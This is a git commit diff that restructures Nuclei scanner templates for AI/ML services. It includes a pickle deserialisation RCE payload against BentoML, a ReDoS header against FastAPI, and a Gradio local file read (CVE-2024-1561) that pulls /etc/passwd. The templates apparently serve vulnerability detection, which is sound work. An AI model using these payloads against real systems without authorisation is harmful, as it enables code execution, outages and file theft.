feat: change some templates structure to make it readable and fix fastapi-dos template

main
Muhammad Daffa 2024-07-23 14:17:53 +07:00
parent 19796edfed
commit ba0171f6c4
4 changed files with 37 additions and 30 deletions

View File

@ -13,7 +13,7 @@ info:
cwe-id: CWE-1188 # Insecure Default Initialization of Resource
tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning
requests:
http:
- method: POST
path:
- "{{BaseURL}}/summarize"
@ -21,6 +21,7 @@ requests:
Content-Type: "application/vnd.bentoml+pickle"
body: !!binary |
gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4=
matchers-condition: and
matchers:
- type: word

View File

@ -1,7 +1,7 @@
id: fastapi-redos
info:
name: Check FastAPI ReDoS Vulnerability in Form Data Parsing
author: DanMcInerney, byt3bl33d3r, nicecatch2000
author: DanMcInerney, byt3bl33d3r, nicecatch2000, daffainfo
severity: high
description: Checks for ReDoS vulnerability in FastAPI when parsing form data with a malicious Content-Type header.
reference:
@ -11,13 +11,18 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cwe-id: CWE-400 # Resource Exhaustion
tags: fastapi, redos, dos, vulnerability, ai, ml, protectai, huntr
requests:
- method: POST
path:
- "{{BaseURL}}/submit/"
headers:
Content-Type: "application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'"
body: "input=1"
http:
- raw:
- |+
POST /submit/ HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded; !="\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Content-Length: 7
input=1
unsafe: true
matchers-condition: and
matchers:
- type: status
@ -25,5 +30,7 @@ requests:
- 500
- 502
- 504
- type: time
time: 5000 # Milliseconds, you may adjust this threshold based on expected response times
- type: dsl
dsl:
- 'duration>=5'

View File

@ -1,7 +1,7 @@
id: gradio-local-file-include
info:
name: Gradio Local File Read Vulnerability
author: ozelis, DanMcInerney
author: ozelis, DanMcInerney, daffainfo
severity: high
description: This nuclei template checks for Local File Read vulnerability in Gradio applications.
reference:
@ -13,7 +13,9 @@ info:
cve-id: CVE-2024-1561
tags: gradio, lfi, local-file-include, python, api, ai, machine-learning, huntr
requests:
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/config"
@ -26,20 +28,18 @@ requests:
json:
- ".components[0].id"
- method: POST
path:
- "{{BaseURL}}/component_server"
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
headers:
Content-Type: application/json
body: |
{
"component_id": "{{component_id}}",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"
}
{
"component_id": "{{component_id}}",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"
}
extractors:
- type: regex
@ -48,16 +48,16 @@ requests:
internal: true
group: 1
regex:
- "\"(.+)\""
- '"(.+)"'
- method: GET
path:
- "{{BaseURL}}/file={{extracted_content}}"
matchers-condition: and
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"

View File

@ -13,7 +13,6 @@ info:
cwe-id: CWE-29
tags: ray,ml,cve,huntr,protectai
http:
- method: GET
path: